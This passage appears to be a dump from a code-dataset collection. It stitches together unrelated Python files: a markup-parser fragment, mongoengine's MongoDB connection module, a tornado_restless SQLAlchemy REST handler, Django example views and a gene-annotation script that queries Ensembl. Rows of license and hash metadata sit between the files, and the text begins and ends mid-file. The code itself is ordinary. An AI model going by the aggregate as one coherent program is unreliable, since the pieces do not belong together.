self.cmd_draw()
self.cmd_restore()
self.level -= 1
return self._state_normal
elif c == '\n':
self.cmd_draw()
self.cmd_newline()
else:
self.out.write(c)
return self._state_normal
def _state_single(self, c):
self.cursor += 1
if c == '\n':
# Ignore newlines.
return self._state_single
if c == '\\':
return self.push_state(self._state_single, self._state_literal)
self.out.write(c)
self.cmd_draw()
self.cmd_restore()
return self._state_normal
def _state_literal(self, c):
self.cursor += 1
self.out.write(c)
return self.pop_state()
def _state_wait_sup(self, c):
return self._state_wait_sub(c, sup=True)
def _state_wait_sub(self, c, sup=False):
self.cursor += 1
if c in '_^':
if (c == '^') == sup:
self.out.write(c)
return self._state_normal
self.cmd_draw()
self.cmd_save()
if sup:
self.cmd_superscript()
else:
self.cmd_subscript()
if c != '{':
self.cursor -= 1
return self._state_single
self.level += 1
return self._state_normal
|
lgpl-2.1
| -1,941,142,295,996,412,400
| 27.775862
| 76
| 0.547933
| false
| 3.863426
| false
| false
| false
|
ganeshcmohan/mongoengine.0.8.7_v1
|
mongoengine/connection.py
|
1
|
5806
|
import pymongo
from pymongo import MongoClient, MongoReplicaSetClient, uri_parser
__all__ = ['ConnectionError', 'connect', 'register_connection',
'DEFAULT_CONNECTION_NAME']
DEFAULT_CONNECTION_NAME = 'default'
class ConnectionError(Exception):
pass
_connection_settings = {}
_connections = {}
_dbs = {}
def register_connection(alias, name, host=None, port=None,
is_slave=False, read_preference=False, slaves=None,
username=None, password=None, **kwargs):
"""Add a connection.
:param alias: the name that will be used to refer to this connection
throughout MongoEngine
:param name: the name of the specific database to use
:param host: the host name of the :program:`mongod` instance to connect to
:param port: the port that the :program:`mongod` instance is running on
:param is_slave: whether the connection can act as a slave
** Depreciated pymongo 2.0.1+
:param read_preference: The read preference for the collection
** Added pymongo 2.1
:param slaves: a list of aliases of slave connections; each of these must
be a registered connection that has :attr:`is_slave` set to ``True``
:param username: username to authenticate with
:param password: password to authenticate with
:param kwargs: allow ad-hoc parameters to be passed into the pymongo driver
"""
global _connection_settings
conn_settings = {
'name': name,
'host': host or 'localhost',
'port': port or 27017,
'is_slave': is_slave,
'slaves': slaves or [],
'username': username,
'password': password,
#'read_preference': read_preference
}
# Handle uri style connections
if "://" in conn_settings['host']:
uri_dict = uri_parser.parse_uri(conn_settings['host'])
conn_settings.update({
'name': uri_dict.get('database') or name,
'username': uri_dict.get('username'),
'password': uri_dict.get('password'),
#'read_preference': read_preference,
})
if "replicaSet" in conn_settings['host']:
conn_settings['replicaSet'] = True
conn_settings.update(kwargs)
_connection_settings[alias] = conn_settings
def disconnect(alias=DEFAULT_CONNECTION_NAME):
global _connections
global _dbs
if alias in _connections:
get_connection(alias=alias).disconnect()
del _connections[alias]
if alias in _dbs:
del _dbs[alias]
def get_connection(alias=DEFAULT_CONNECTION_NAME, reconnect=False):
global _connections
# Connect to the database if not already connected
if reconnect:
disconnect(alias)
if alias not in _connections:
if alias not in _connection_settings:
msg = 'Connection with alias "%s" has not been defined' % alias
if alias == DEFAULT_CONNECTION_NAME:
msg = 'You have not defined a default connection'
raise ConnectionError(msg)
conn_settings = _connection_settings[alias].copy()
if hasattr(pymongo, 'version_tuple'): # Support for 2.1+
conn_settings.pop('name', None)
conn_settings.pop('slaves', None)
conn_settings.pop('is_slave', None)
conn_settings.pop('username', None)
conn_settings.pop('password', None)
else:
# Get all the slave connections
if 'slaves' in conn_settings:
slaves = []
for slave_alias in conn_settings['slaves']:
slaves.append(get_connection(slave_alias))
conn_settings['slaves'] = slaves
conn_settings.pop('read_preference', None)
connection_class = MongoClient
if 'replicaSet' in conn_settings:
conn_settings['hosts_or_uri'] = conn_settings.pop('host', None)
# Discard port since it can't be used on MongoReplicaSetClient
conn_settings.pop('port', None)
# Discard replicaSet if not base string
if not isinstance(conn_settings['replicaSet'], basestring):
conn_settings.pop('replicaSet', None)
connection_class = MongoReplicaSetClient
try:
_connections[alias] = connection_class(**conn_settings)
except Exception, e:
raise ConnectionError("Cannot connect to database %s :\n%s" % (alias, e))
return _connections[alias]
def get_db(alias=DEFAULT_CONNECTION_NAME, reconnect=False):
global _dbs
if reconnect:
disconnect(alias)
if alias not in _dbs:
conn = get_connection(alias)
conn_settings = _connection_settings[alias]
db = conn[conn_settings['name']]
# Authenticate if necessary
if conn_settings['username'] and conn_settings['password']:
db.authenticate(conn_settings['username'],
conn_settings['password'])
_dbs[alias] = db
return _dbs[alias]
def connect(db, alias=DEFAULT_CONNECTION_NAME, **kwargs):
"""Connect to the database specified by the 'db' argument.
Connection settings may be provided here as well if the database is not
running on the default port on localhost. If authentication is needed,
provide username and password arguments as well.
Multiple databases are supported by using aliases. Provide a separate
`alias` to connect to a different instance of :program:`mongod`.
.. versionchanged:: 0.6 - added multiple database support.
"""
global _connections
if alias not in _connections:
register_connection(alias, db, **kwargs)
return get_connection(alias)
# Support old naming convention
_get_connection = get_connection
_get_db = get_db
|
mit
| 8,341,579,631,674,937,000
| 33.975904
| 85
| 0.631244
| false
| 4.349064
| false
| false
| false
|
tornado-utils/tornado-restless
|
tornado_restless/handler.py
|
1
|
28297
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
"""
Tornado Restless BaseHandler
Handles all registered blueprints, you may override this class and
use the modification via create_api_blueprint(handler_class=...)
"""
import inspect
from json import loads
import logging
from math import ceil
from traceback import print_exception
from urllib.parse import parse_qs
import sys
import itertools
from sqlalchemy import inspect as sqinspect
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy.orm.exc import NoResultFound, UnmappedInstanceError, MultipleResultsFound
from sqlalchemy.util import memoized_instancemethod, memoized_property
from tornado.web import RequestHandler, HTTPError
from .convert import to_dict, to_filter
from .errors import IllegalArgumentError, MethodNotAllowedError, ProcessingException
from .wrapper import SessionedModelWrapper
__author__ = 'Martin Martimeo <martin@martimeo.de>'
__date__ = '26.04.13 - 22:09'
class BaseHandler(RequestHandler):
"""
Basic Blueprint for a sqlalchemy model
Subclass of :class:`tornado.web.RequestHandler` that handles web requests.
Overwrite :func:`get() <get>` / :func:`post() <post>` / :func:`put() <put>` /
:func:`patch() <patch>` / :func:`delete() <delete>` if you want complete customize handling of the methods.
Note that the default implementation of this function check for the allowness and then call depending on
the instance_id parameter the associated _single / _many method, so you probably want to call super()
If you just want to customize the handling of the methods overwrite method_single or method_many.
If you want completly disable a method overwrite the SUPPORTED_METHODS constant
"""
ID_SEPARATOR = ","
SUPPORTED_METHODS = ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']
# noinspection PyMethodOverriding
def initialize(self,
model,
manager,
methods: set,
preprocessor: dict,
postprocessor: dict,
allow_patch_many: bool,
allow_method_override: bool,
validation_exceptions,
exclude_queries: bool,
exclude_hybrids: bool,
include_columns: list,
exclude_columns: list,
results_per_page: int,
max_results_per_page: int):
"""
Init of the handler, derives arguments from api create_api_blueprint
:param model: The sqlalchemy model
:param manager: The tornado_restless Api Manager
:param methods: Allowed methods for this model
:param preprocessor: A dictionary of preprocessor functions
:param postprocessor: A dictionary of postprocessor functions
:param allow_patch_many: Allow PATCH with multiple datasets
:param allow_method_override: Support X-HTTP-Method-Override Header
:param validation_exceptions:
:param exclude_queries: Don't execude dynamic queries (like from associations or lazy relations)
:param exclude_hybrids: When exclude_queries is True and exclude_hybrids is False, hybrids are still included.
:param include_columns: Whitelist of columns to be included
:param exclude_columns: Blacklist of columns to be excluded
:param results_per_page: The default value of how many results are returned per request
:param max_results_per_page: The hard upper limit of resutest per page
:reqheader X-HTTP-Method-Override: If allow_method_override is True, this header overwrites the request method
"""
# Override Method if Header provided
if allow_method_override and 'X-HTTP-Method-Override' in self.request.headers:
self.request.method = self.request.headers['X-HTTP-Method-Override']
super(BaseHandler, self).initialize()
self.model = SessionedModelWrapper(model, manager.session_maker())
self.pk_length = len(sqinspect(model).primary_key)
self.methods = [method.lower() for method in methods]
self.allow_patch_many = allow_patch_many
self.validation_exceptions = validation_exceptions
self.preprocessor = preprocessor
self.postprocessor = postprocessor
self.results_per_page = results_per_page
self.max_results_per_page = max_results_per_page
self.include = self.parse_columns(include_columns)
self.exclude = self.parse_columns(exclude_columns)
self.to_dict_options = {'execute_queries': not exclude_queries, 'execute_hybrids': not exclude_hybrids}
def prepare(self):
"""
Prepare the request
"""
self._call_preprocessor()
def on_finish(self):
"""
Finish the request
"""
self._call_postprocessor()
def parse_columns(self, strings: list) -> dict:
"""
Parse a list of column names (name1, name2, relation.name1, ...)
:param strings: List of Column Names
:return:
"""
columns = {}
# Strings
if strings is None:
return None
# Parse
for column in [column.split(".", 1) for column in strings]:
if len(column) == 1:
columns[column[0]] = True
else:
columns.setdefault(column[0], []).append(column[1])
# Now parse relations
for (key, item) in columns.items():
if isinstance(item, list):
columns[key] = itertools.chain.from_iterable(self.parse_columns(strings) for strings in item)
# Return
return columns
def get_filters(self):
"""
Returns a list of filters made by the query argument
:query filters: list of filters
:query order_by: list of orderings
"""
# Get all provided filters
argument_filters = self.get_query_argument("filters", [])
# Get all provided orders
argument_orders = self.get_query_argument("order_by", [])
return to_filter(self.model.model, argument_filters, argument_orders)
def write_error(self, status_code: int, **kwargs):
"""
Encodes any exceptions thrown to json
SQLAlchemyError will be encoded as 400 / SQLAlchemy: Bad Request
Errors from the restless api as 400 / Restless: Bad Arguments
ProcessingException will be encoded with status code / ProcessingException: Stopped Processing
Any other exceptions will occur as an 500 exception
:param status_code: The Status Code in Response
:param kwargs: Additional Parameters
"""
if 'exc_info' in kwargs:
exc_type, exc_value = kwargs['exc_info'][:2]
if status_code >= 300:
print_exception(*kwargs['exc_info'])
if issubclass(exc_type, UnmappedInstanceError):
self.set_status(400, reason='SQLAlchemy: Unmapped Instance')
self.finish(dict(type=exc_type.__module__ + "." + exc_type.__name__,
message="%s" % exc_value))
elif issubclass(exc_type, SQLAlchemyError):
if issubclass(exc_type, NoResultFound):
status = 404
reason = message = 'No result found'
elif issubclass(exc_type, MultipleResultsFound):
status = 400
reason = 'SQLAlchemy: Bad Request'
message = 'Multiple results found'
else:
status = 400
reason = 'SQLAlchemy: Bad Request'
message = "%s" % exc_value
self.set_status(status, reason=reason)
self.finish(dict(type=exc_type.__module__ + "." + exc_type.__name__,
message=message))
elif issubclass(exc_type, IllegalArgumentError):
self.set_status(400, reason='Restless: Bad Arguments')
self.finish(dict(type=exc_type.__module__ + "." + exc_type.__name__,
message="%s" % exc_value))
elif issubclass(exc_type, ProcessingException):
self.set_status(status_code,
reason='ProcessingException: %s' % (exc_value.reason or "Stopped Processing"))
self.finish(dict(type=exc_type.__module__ + "." + exc_type.__name__,
message="%s" % exc_value))
elif issubclass(exc_type, HTTPError) and exc_value.reason:
self.set_status(status_code, reason=exc_value.reason)
self.finish(dict(type=exc_type.__module__ + "." + exc_type.__name__,
message="%s" % exc_value, **exc_value.__dict__))
else:
super().write_error(status_code, **kwargs)
else:
super().write_error(status_code, **kwargs)
def patch(self, instance_id: str=None):
"""
PATCH (update instance) request
:param instance_id: query argument of request
:type instance_id: comma seperated string list
:statuscode 403: PATCH MANY disallowed
:statuscode 405: PATCH disallowed
"""
if not 'patch' in self.methods:
raise MethodNotAllowedError(self.request.method)
self._call_preprocessor(search_params=self.search_params)
if instance_id is None:
if self.allow_patch_many:
result = self.patch_many()
else:
raise MethodNotAllowedError(self.request.method, status_code=403)
else:
result = self.patch_single(self.parse_pk(instance_id))
self._call_postprocessor(result=result)
self.finish(result)
def patch_many(self) -> dict:
"""
Patch many instances
:statuscode 201: instances successfull modified
:query limit: limit the count of modified instances
:query single: If true sqlalchemy will raise an error if zero or more than one instances would be modified
"""
# Flush
self.model.session.flush()
# Get values
values = self.get_argument_values()
# Filters
filters = self.get_filters()
# Limit
limit = self.get_query_argument("limit", None)
# Call Preprocessor
self._call_preprocessor(filters=filters, data=values)
# Modify Instances
if self.get_query_argument("single", False):
instances = [self.model.one(filters=filters)]
for instance in instances:
for (key, value) in values.items():
logging.debug("%s => %s" % (key, value))
setattr(instance, key, value)
num = 1
else:
num = self.model.update(values, limit=limit, filters=filters)
# Commit
self.model.session.commit()
# Result
self.set_status(201, "Patched")
return {'num_modified': num}
def patch_single(self, instance_id: list) -> dict:
"""
Patch one instance
:param instance_id: query argument of request
:type instance_id: list of primary keys
:statuscode 201: instance successfull modified
:statuscode 404: Error
"""
try:
with self.model.session.begin_nested():
values = self.get_argument_values()
# Call Preprocessor
self._call_preprocessor(instance_id=instance_id, data=values)
# Get Instance
instance = self.model.get(*instance_id)
# Set Values
for (key, value) in values.items():
self.logger.debug("%r.%s => %s" % (instance, key, value))
setattr(instance, key, value)
# Flush
try:
self.model.session.flush()
except SQLAlchemyError as ex:
logging.exception(ex)
self.model.session.rollback()
self.send_error(status_code=400, exc_info=sys.exc_info())
return
# Refresh
self.model.session.refresh(instance)
# Set Status
self.set_status(201, "Patched")
# To Dict
return self.to_dict(instance)
except SQLAlchemyError as ex:
logging.exception(ex)
self.send_error(status_code=400, exc_info=sys.exc_info())
finally:
# Commit
self.model.session.commit()
def delete(self, instance_id: str=None):
"""
DELETE (delete instance) request
:param instance_id: query argument of request
:type instance_id: comma seperated string list
:statuscode 403: DELETE MANY disallowed
:statuscode 405: DELETE disallowed
"""
if not 'delete' in self.methods:
raise MethodNotAllowedError(self.request.method)
# Call Preprocessor
self._call_preprocessor(search_params=self.search_params)
if instance_id is None:
if self.allow_patch_many:
result = self.delete_many()
else:
raise MethodNotAllowedError(self.request.method, status_code=403)
else:
result = self.delete_single(self.parse_pk(instance_id))
self._call_postprocessor(result=result)
self.finish(result)
def delete_many(self) -> dict:
"""
Remove many instances
:statuscode 200: instances successfull removed
:query limit: limit the count of deleted instances
:query single: If true sqlalchemy will raise an error if zero or more than one instances would be deleted
"""
# Flush
self.model.session.flush()
# Filters
filters = self.get_filters()
# Limit
limit = self.get_query_argument("limit", None)
# Call Preprocessor
self._call_preprocessor(filters=filters)
# Modify Instances
if self.get_query_argument("single", False):
instance = self.model.one(filters=filters)
self.model.session.delete(instance)
self.model.session.commit()
num = 1
else:
num = self.model.delete(limit=limit, filters=filters)
# Commit
self.model.session.commit()
# Result
self.set_status(200, "Removed")
return {'num_removed': num}
def delete_single(self, instance_id: list) -> dict:
"""
Get one instance
:param instance_id: query argument of request
:type instance_id: list of primary keys
:statuscode 204: instance successfull removed
"""
# Call Preprocessor
self._call_preprocessor(instance_id=instance_id)
# Get Instance
instance = self.model.get(*instance_id)
# Trigger deletion
self.model.session.delete(instance)
self.model.session.commit()
# Status
self.set_status(204, "Instance removed")
return {}
def put(self, instance_id: str=None):
"""
PUT (update instance) request
:param instance_id: query argument of request
:type instance_id: comma seperated string list
:statuscode 403: PUT MANY disallowed
:statuscode 404: Error
:statuscode 405: PUT disallowed
"""
if not 'put' in self.methods:
raise MethodNotAllowedError(self.request.method)
# Call Preprocessor
self._call_preprocessor(search_params=self.search_params)
if instance_id is None:
if self.allow_patch_many:
result = self.put_many()
else:
raise MethodNotAllowedError(self.request.method, status_code=403)
else:
result = self.put_single(self.parse_pk(instance_id))
self._call_postprocessor(result=result)
self.finish(result)
put_many = patch_many
put_single = patch_single
def post(self, instance_id: str=None):
"""
POST (new input) request
:param instance_id: (ignored)
:statuscode 204: instance successfull created
:statuscode 404: Error
:statuscode 405: POST disallowed
"""
if not 'post' in self.methods:
raise MethodNotAllowedError(self.request.method)
# Call Preprocessor
self._call_preprocessor(search_params=self.search_params)
result = self.post_single()
self._call_postprocessor(result=result)
self.finish(result)
def post_single(self):
"""
Post one instance
"""
try:
values = self.get_argument_values()
# Call Preprocessor
self._call_preprocessor(data=values)
# Create Instance
instance = self.model(**values)
# Flush
self.model.session.commit()
# Refresh
self.model.session.refresh(instance)
# Set Status
self.set_status(201, "Created")
# To Dict
return self.to_dict(instance)
except SQLAlchemyError:
self.send_error(status_code=400, exc_info=sys.exc_info())
self.model.session.rollback()
finally:
# Commit
self.model.session.commit()
@memoized_instancemethod
def get_content_encoding(self) -> str:
"""
Get the encoding the client sends us for encoding request.body correctly
:reqheader Content-Type: Provide a charset in addition for decoding arguments.
"""
content_type_args = {k.strip(): v for k, v in parse_qs(self.request.headers['Content-Type']).items()}
if 'charset' in content_type_args and content_type_args['charset']:
return content_type_args['charset'][0]
else:
return 'latin1'
@memoized_instancemethod
def get_body_arguments(self) -> dict:
"""
Get arguments encode as json body
:statuscode 415: Content-Type mismatch
:reqheader Content-Type: application/x-www-form-urlencoded or application/json
"""
self.logger.debug(self.request.body)
content_type = self.request.headers.get('Content-Type')
if 'www-form-urlencoded' in content_type:
payload = self.request.arguments
for key, value in payload.items():
if len(value) == 0:
payload[key] = None
elif len(value) == 1:
payload[key] = str(value[0], encoding=self.get_content_encoding())
else:
payload[key] = [str(value, encoding=self.get_content_encoding()) for value in value]
return payload
elif 'application/json' in content_type:
return loads(str(self.request.body, encoding=self.get_content_encoding()))
else:
raise HTTPError(415, content_type=content_type)
def get_body_argument(self, name: str, default=RequestHandler._ARG_DEFAULT):
"""
Get an argument named key from json encoded body
:param name: Name of argument
:param default: Default value, if not provided HTTPError 404 is raised
:return:
:statuscode 404: Missing Argument
"""
arguments = self.get_body_arguments()
if name in arguments:
return arguments[name]
elif default is RequestHandler._ARG_DEFAULT:
raise HTTPError(400, "Missing argument %s" % name)
else:
return default
@property
def search_params(self) -> dict:
"""
The 'q' Dictionary
"""
try:
return self._search_params
except AttributeError:
self._search_params = loads(self.get_argument("q", default="{}"))
return self._search_params
def get_query_argument(self, name: str, default=RequestHandler._ARG_DEFAULT):
"""
Get an argument named key from json encoded body
:param name:
:param default:
:return:
:raise: 400 Missing Argument
:query q: The query argument
"""
if name in self.search_params:
return self.search_params[name]
elif default is RequestHandler._ARG_DEFAULT:
raise HTTPError(400, "Missing argument %s" % name)
else:
return default
def get_argument(self, name: str, *args, **kwargs):
"""
On PUT/PATCH many request parameter may be located in body instead of query
:param name: Name of argument
:param args: Additional position arguments @see tornado.web.RequestHandler.get_argument
:param kwargs: Additional keyword arguments @see tornado.web.RequestHandler.get_argument
"""
try:
return super().get_argument(name, *args, **kwargs)
except HTTPError:
if name == "q" and self.request.method in ['PUT', 'PATCH']:
return self.get_body_argument(name, *args, **kwargs)
else:
raise
def get_argument_values(self):
"""
Get all values provided via arguments
:query q: (ignored)
"""
# Include Columns
if self.include is not None:
values = {k: self.get_body_argument(k) for k in self.include}
else:
values = {k: v for k, v in self.get_body_arguments().items()}
# Exclude "q"
if "q" in values:
del values["q"]
# Exclude Columns
if self.exclude is not None:
for column in list(self.exclude):
if column in values:
del values[column]
# Silently Ignore proxies
for proxy in self.model.proxies:
if proxy.key in values:
self.logger.debug("Skipping proxy: %s" % proxy.key)
del values[proxy.key]
# Silently Ignore hybrids
for hybrid in self.model.hybrids:
if hybrid.key in values:
self.logger.debug("Skipping hybrid: %s" % hybrid.key)
del values[hybrid.key]
# Handle Relations extra
values_relations = {}
for relation_key, relation in self.model.relations.items():
if relation_key in values:
values_relations[relation_key] = values[relation_key]
del values[relation_key]
# Check Columns
#for column in values:
# if not column in self.model.column_names:
# raise IllegalArgumentError("Column '%s' not defined for model %s" % (column, self.model.model))
return values
def get(self, instance_id: str=None):
"""
GET request
:param instance_id: query argument of request
:type instance_id: comma seperated string list
:statuscode 405: GET disallowed
"""
if not 'get' in self.methods:
raise MethodNotAllowedError(self.request.method)
# Call Preprocessor
self._call_preprocessor(search_params=self.search_params)
if instance_id is None:
result = self.get_many()
else:
result = self.get_single(self.parse_pk(instance_id))
self._call_postprocessor(result=result)
self.finish(result)
def get_single(self, instance_id: list) -> dict:
"""
Get one instance
:param instance_id: query argument of request
:type instance_id: list of primary keys
"""
# Call Preprocessor
self._call_preprocessor(instance_id=instance_id)
# Get Instance
instance = self.model.get(*instance_id)
# To Dict
return self.to_dict(instance)
def get_many(self) -> dict:
"""
Get all instances
Note that it is possible to provide offset and page as argument then
it will return instances of the nth page and skip offset items
:statuscode 400: if results_per_page > max_results_per_page or offset < 0
:query results_per_page: Overwrite the returned results_per_page
:query offset: Skip offset instances
:query page: Return nth page
:query limit: limit the count of modified instances
:query single: If true sqlalchemy will raise an error if zero or more than one instances would be deleted
"""
# All search params
search_params = {'single': self.get_query_argument("single", False),
'results_per_page': int(self.get_argument("results_per_page", self.results_per_page)),
'offset': int(self.get_query_argument("offset", 0))}
# Results per Page Check
if search_params['results_per_page'] > self.max_results_per_page:
raise IllegalArgumentError("request.results_per_page > application.max_results_per_page")
# Offset & Page
page = int(self.get_argument("page", '1')) - 1
search_params['offset'] += page * search_params['results_per_page']
if search_params['offset'] < 0:
raise IllegalArgumentError("request.offset < 0")
# Limit
search_params['limit'] = self.get_query_argument("limit", search_params['results_per_page'] or None)
# Filters
filters = self.get_filters()
# Call Preprocessor
self._call_preprocessor(filters=filters, search_params=search_params)
# Num Results
num_results = self.model.count(filters=filters)
if search_params['results_per_page']:
total_pages = ceil(num_results / search_params['results_per_page'])
else:
total_pages = 1
# Get Instances
if search_params['single']:
instance = self.model.one(offset=search_params['offset'],
filters=filters)
return self.to_dict(instance)
else:
instances = self.model.all(offset=search_params['offset'],
limit=search_params['limit'],
filters=filters)
return {'num_results': num_results,
"total_pages": total_pages,
"page": page + 1,
"objects": self.to_dict(instances)}
def _call_preprocessor(self, *args, **kwargs):
"""
Calls a preprocessor with args and kwargs
"""
func_name = inspect.stack()[1][3]
if func_name in self.preprocessor:
for func in self.preprocessor[func_name]:
func(*args, model=self.model, handler=self, **kwargs)
def _call_postprocessor(self, *args, **kwargs):
"""
Calls a postprocessor with args and kwargs
"""
func_name = inspect.stack()[1][3]
if func_name in self.postprocessor:
for func in self.postprocessor[func_name]:
func(*args, model=self.model, handler=self, **kwargs)
@memoized_property
def logger(self):
"""
Tornado Restless Logger
"""
return logging.getLogger('tornado.restless')
def to_dict(self, instance):
"""
Wrapper to convert.to_dict with arguments from blueprint init
:param instance: Instance to be translated
"""
return to_dict(instance,
include=self.include,
exclude=self.exclude,
options=self.to_dict_options)
def parse_pk(self, instance_id):
return instance_id.split(self.ID_SEPARATOR, self.pk_length - 1)
|
bsd-3-clause
| 8,033,356,386,240,784,000
| 33.805658
| 118
| 0.57628
| false
| 4.509482
| false
| false
| false
|
pkimber/block
|
example_block/views.py
|
1
|
1619
|
# -*- encoding: utf-8 -*-
from django.views.generic import TemplateView
from braces.views import (
LoginRequiredMixin,
StaffuserRequiredMixin,
)
from base.view_utils import BaseMixin
from block.forms import ContentEmptyForm
from block.views import (
ContentCreateView,
ContentPublishView,
ContentRemoveView,
ContentUpdateView,
PageTemplateView,
)
from .forms import TitleForm
from .models import (
Title,
TitleBlock,
)
class ExampleView(PageTemplateView):
def get_context_data(self, **kwargs):
context = super(ExampleView, self).get_context_data(**kwargs)
context.update(dict(
calendar=('Jan', 'Feb', 'Mar'),
))
return context
class SettingsView(BaseMixin, TemplateView):
template_name = 'example/settings.html'
class TitleCreateView(
LoginRequiredMixin, StaffuserRequiredMixin, ContentCreateView):
block_class = TitleBlock
form_class = TitleForm
model = Title
template_name = 'example/title_update.html'
class TitleUpdateView(
LoginRequiredMixin, StaffuserRequiredMixin, ContentUpdateView):
form_class = TitleForm
model = Title
template_name = 'example/title_update.html'
class TitlePublishView(
LoginRequiredMixin, StaffuserRequiredMixin, ContentPublishView):
form_class = ContentEmptyForm
model = Title
template_name = 'example/title_publish.html'
class TitleRemoveView(
LoginRequiredMixin, StaffuserRequiredMixin, ContentRemoveView):
form_class = ContentEmptyForm
model = Title
template_name = 'example/title_remove.html'
|
apache-2.0
| 4,447,388,726,142,022,700
| 21.802817
| 72
| 0.714021
| false
| 4.067839
| false
| false
| false
|
T2DREAM/t2dream-portal
|
src/encoded/commands/generate_annotations.py
|
1
|
9507
|
import requests
import json
import re
import time
import multiprocessing as mp
EPILOG = __doc__
_HGNC_FILE = 'https://www.encodeproject.org/files/ENCFF277WZC/@@download/ENCFF277WZC.tsv'
_MOUSE_FILE = 'https://www.encodeproject.org/files/ENCFF097CIT/@@download/ENCFF097CIT.tsv'
_DM_FILE = 'https://www.encodeproject.org/files/ENCFF311QAL/@@download/ENCFF311QAL.tsv'
_CE_FILE = 'https://www.encodeproject.org/files/ENCFF324UJT/@@download/ENCFF324UJT.tsv'
_ENSEMBL_URL = 'http://rest.ensembl.org/'
_GENEINFO_URL = 'http://mygene.info/v2/gene/'
def get_annotation():
return {
'assembly_name': '',
'chromosome': '',
'start': '',
'end': ''
}
def rate_limited_request(url):
response = requests.get(url)
if int(response.headers.get('X-RateLimit-Remaining')) < 2:
print('spleeping for about {} seconds'.format(response.headers.get('X-RateLimit-Reset')))
time.sleep(int(float(response.headers.get('X-RateLimit-Reset'))) + 1)
return response.json()
def assembly_mapper(location, species, input_assembly, output_assembly):
# All others
new_url = _ENSEMBL_URL + 'map/' + species + '/' \
+ input_assembly + '/' + location + '/' + output_assembly \
+ '/?content-type=application/json'
try:
new_response = rate_limited_request(new_url)
except:
return('', '', '')
else:
if not len(new_response['mappings']):
return('', '', '')
data = new_response['mappings'][0]['mapped']
chromosome = data['seq_region_name']
start = data['start']
end = data['end']
return(chromosome, start, end)
def human_single_annotation(r):
annotations = []
species = ' (homo sapiens)'
species_for_payload = re.split('[(|)]', species)[1]
# Ensembl ID is used to grab annotations for different references
if 'Ensembl Gene ID' not in r:
return
if not r['Ensembl Gene ID']:
return
# Annotations are keyed by Gene ID in ES
if 'Entrez Gene ID' not in r:
return
if not r['Entrez Gene ID']:
return
# Assumption: payload.id and id should always be same
doc = {'annotations': []}
doc['suggest'] = {
'input': [r['Approved Name'] + species,
r['Approved Symbol'] + species,
r['HGNC ID'],
r['Entrez Gene ID'] + ' (Gene ID)']
}
doc['payload'] = {'id': r['HGNC ID'],
'species': species_for_payload}
doc['id'] = r['HGNC ID']
if r['Entrez Gene ID'].isdigit():
r['Entrez Gene ID'] = int(r['Entrez Gene ID'])
# Adding gene synonyms to autocomplete
if r['Synonyms'] is not None and r['Synonyms'] != '':
synonyms = [x.strip(' ') + species for x in r['Synonyms'].split(',')]
doc['suggest']['input'] = doc['suggest']['input'] + synonyms
url = '{ensembl}lookup/id/{id}?content-type=application/json'.format(
ensembl=_ENSEMBL_URL,
id=r['Ensembl Gene ID'])
try:
response = rate_limited_request(url)
except:
return
else:
annotation = get_annotation()
if 'assembly_name' not in response:
return
annotation['assembly_name'] = response['assembly_name']
annotation['chromosome'] = response['seq_region_name']
annotation['start'] = response['start']
annotation['end'] = response['end']
doc['annotations'].append(annotation)
# Get GRcH37 annotation
location = response['seq_region_name'] \
+ ':' + str(response['start']) \
+ '-' + str(response['end'])
ann = get_annotation()
ann['assembly_name'] = 'GRCh37'
ann['chromosome'], ann['start'], ann['end'] = \
assembly_mapper(location, response['species'],
'GRCh38', 'GRCh37')
doc['annotations'].append(ann)
annotations.append({
"index": {
"_index": "annotations",
"_type": "default",
"_id": doc['id']
}
})
annotations.append(doc)
print('human {}'.format(time.time()))
return annotations
def mouse_single_annotation(r):
annotations = []
if 'Chromosome Name' not in r:
return
doc = {'annotations': []}
species = ' (mus musculus)'
species_for_payload = re.split('[(|)]', species)[1]
doc['suggest'] = {
'input': []
}
doc['payload'] = {'id': r['Ensembl Gene ID'],
'species': species_for_payload}
doc['id'] = r['Ensembl Gene ID']
if 'MGI symbol' in r and r['MGI symbol'] is not None:
doc['suggest']['input'].append(r['MGI symbol'] + species)
if 'MGI ID' in r and r['MGI ID'] is not None:
doc['suggest']['input'].append(r['MGI ID'] + species)
doc['annotations'].append({
'assembly_name': 'GRCm38',
'chromosome': r['Chromosome Name'],
'start': r['Gene Start (bp)'],
'end': r['Gene End (bp)']
})
mm9_url = '{geneinfo}{ensembl}?fields=genomic_pos_mm9'.format(
geneinfo=_GENEINFO_URL,
ensembl=r['Ensembl Gene ID']
)
try:
response = requests.get(mm9_url).json()
except:
return
else:
if 'genomic_pos_mm9' in response and isinstance(response['genomic_pos_mm9'], dict):
ann = get_annotation()
ann['assembly_name'] = 'GRCm37'
ann['chromosome'] = response['genomic_pos_mm9']['chr']
ann['start'] = response['genomic_pos_mm9']['start']
ann['end'] = response['genomic_pos_mm9']['end']
doc['annotations'].append(ann)
annotations.append({
"index": {
"_index": "annotations",
"_type": "default",
"_id": doc['id']
}
})
annotations.append(doc)
print('mouse {}'.format(time.time()))
return annotations
def get_rows_from_file(file_name, row_delimiter):
response = requests.get(file_name)
rows = response.content.decode('utf-8').split(row_delimiter)
header = rows[0].split('\t')
zipped_rows = [dict(zip(header, row.split('\t'))) for row in rows[1:]]
return zipped_rows
def prepare_for_bulk_indexing(annotations):
flattened_annotations = []
for annotation in annotations:
if annotation:
for item in annotation:
flattened_annotations.append(item)
return flattened_annotations
def human_annotations(human_file):
"""
Generates JSON from TSV files
"""
zipped_rows = get_rows_from_file(human_file, '\r')
# Too many processes causes the http requests causes the remote to respond with error
pool = mp.Pool(processes=1)
annotations = pool.map(human_single_annotation, zipped_rows)
return prepare_for_bulk_indexing(annotations)
def mouse_annotations(mouse_file):
"""
Updates and get JSON file for mouse annotations
"""
zipped_rows = get_rows_from_file(mouse_file, '\n')
# Too many processes causes the http requests causes the remote to respond with error
pool = mp.Pool(processes=1)
annotations = pool.map(mouse_single_annotation, zipped_rows)
return prepare_for_bulk_indexing(annotations)
def other_annotations(file, species, assembly):
"""
Generates C. elegans and drosophila annotaions
"""
annotations = []
response = requests.get(file)
header = []
species_for_payload = re.split('[(|)]', species)[1]
for row in response.content.decode('utf-8').split('\n'):
# skipping header row
if len(header) == 0:
header = row.split('\t')
continue
r = dict(zip(header, row.split('\t')))
if 'Chromosome Name' not in r or 'Ensembl Gene ID' not in r:
continue
doc = {'annotations': []}
annotation = get_annotation()
doc['suggest'] = {'input': [r['Associated Gene Name'] + species]}
